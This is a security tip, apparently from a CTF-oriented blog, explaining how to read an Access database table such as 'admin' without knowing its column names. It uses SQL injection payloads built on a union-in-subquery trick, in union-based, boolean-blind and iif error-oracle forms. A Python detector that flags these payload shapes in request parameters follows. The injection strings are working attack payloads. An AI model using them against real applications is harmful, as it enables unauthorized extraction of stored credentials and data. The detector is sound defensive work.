TIPS: Reading a table without knowing its field names, using subqueries
Conditions: the field names of the target table are unknown (the table name is known, as in the example below), and the database supports subqueries.
Useful mainly when dealing with Access; also handy when you are feeling lazy, e.g. dumping the flag tables in various CTFs.
Idea: write a union query for the target table inside a subquery. The first SELECT uses one constant per field as a placeholder and gives each an alias; the second SELECT, joined by UNION, selects all fields (*) from the target table. The result set of this subquery is then read through the outer UNION query or through blind injection.
For example, given the injection point:
select title,time,author,content from article where id={inject here}
There are 4 fields. The table name admin is known, but the fields of admin are unknown.
First, guess the total number of fields in the admin table by adding order by to the subquery (999999999 is a non-existent id):
select title,time,author,content from article where id=999999999 union select 1,2,3,4 from(select * from admin order by 1)
Assume five fields are found. Write the union statement for the subquery and give the placeholder columns aliases:
select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin
Finally, query the subquery's result set:
select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin)
When the database is Access, the aliases can be omitted: Access automatically names an unnamed expression, the first one Expr1000, the second Expr1001, and so on. The statement above then becomes:
select title,time,author,content from article where id=999999999 union select 1 as x,2 as xx,3 as xxx,Expr1000&'|'&Expr1001&'|'&Expr1002&'|'&Expr1003&'|'&Expr1004 as xxxx from(select 1,2,3,4,5 from admin where 1=2 union select * from admin)
NOTE: if the original statement already contains an expression, this query may not work as written.
When conditions need to be added, wrap it in another layer of subquery:
select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select * from (select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin) where field_1 not in (1))
This also works for blind injection (boolean-based: the page echo differs between true and false):
select title,time,author,content from article where id=999999999 or (select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0
It can also be used like this (error-based: an error is reported, or a 500/200 status difference can be observed across repeated attempts):
select title,time,author,content from article where id=999999999 or iif((select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0,1,(select 2 from multi_rows_table))=1
multi_rows_table must contain more than one record, so that the scalar subquery in the false branch returns multiple rows and raises an error.
Finally, some databases require an alias for the subquery (Access does not, so none is written here).
"Mom no longer needs to worry about my Access injection!"
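From the defending side, the shapes above are distinctive enough to flag in request parameters or WAF logs. The following detector is an added example, not part of the original tip: it normalizes a parameter value (case, comments, spacing around parentheses) and matches the four patterns described here (the "select *" derived table, Access's Expr1000-style auto-aliases, the top 1 len() comparison, and the iif() multi-row oracle). All sample values are constructed for offline testing.

```python
import re

# Constructed request-parameter values for offline testing (not captured from
# any real application): the payload shapes from this page plus benign input.
SAMPLES = {
    "benign_id": "42",
    "benign_text": "select the union of two sets from (select) menu",
    "union_star": "999999999 union select 1,2,3,field_1&'|'&field_2 from(select 1 as field_1,2 as field_2 from admin where 1=2 union select * from admin)",
    "expr_alias": "999999999 union select 1 as x,2 as xx,Expr1000&'|'&Expr1001 as xxxx from(select 1,2 from admin where 1=2 union select * from admin)",
    "blind_len": "999999999 or (select top 1 len(field_1) from (select 1 as field_1,2 from admin where 1=2 union select * from admin))>0",
    "iif_oracle": "999999999 or iif((select top 1 len(field_1) from(select 1 as field_1,2 from admin where 1=2 union select * from admin))>0,1,(select 2 from multi_rows_table))=1",
}

def normalize(value: str) -> str:
    """Lower-case, drop SQL comments, collapse whitespace and remove the spaces
    around parentheses, so 'FROM /**/ ( SELECT' and 'from(select' look alike."""
    s = value.lower()
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"--[^\n]*", " ", s)
    s = re.sub(r"\s+", " ", s)
    s = re.sub(r"\s*([()])\s*", r"\1", s)
    return s.strip()

# Each rule names one shape described on this page; all run on normalized text.
RULES = {
    # Derived table that UNIONs constant placeholders with "select *" of a
    # target table: the trick that reads rows without knowing column names.
    "star_subquery": re.compile(r"from\(select .*?union select \* from \w+\)"),
    # Access auto-names unaliased expressions Expr1000, Expr1001, ...
    "access_expr_alias": re.compile(r"\bexpr1\d{3}\b"),
    # Boolean-blind variant: "top 1 len(col)" over that subquery, compared
    # against a number.
    "blind_len_compare": re.compile(r"\(select top 1 len\(\w+\)from\(select .*?\)\)[<>=]"),
    # Error/status oracle: iif() whose false branch is a scalar subquery that
    # returns several rows, forcing an error only when the condition is false.
    "iif_multirow_oracle": re.compile(r"\biif\(.*?,\(select .*? from \w+\)\)="),
}

def classify(value: str) -> list:
    """Return the names of all rules the parameter value matches ([] if clean)."""
    s = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(s)]

def scan(params: dict) -> dict:
    """Map each parameter name to its matched rules, omitting clean parameters."""
    hits = {k: classify(v) for k, v in params.items()}
    return {k: v for k, v in hits.items() if v}

if __name__ == "__main__":
    for name, rules in scan(SAMPLES).items():
        print(f"{name}: {', '.join(rules)}")
```

The rules are deliberately keyed on the nested "from(select ... union select * from ...)" structure rather than on the table name, so renaming admin or changing the placeholder constants does not evade them.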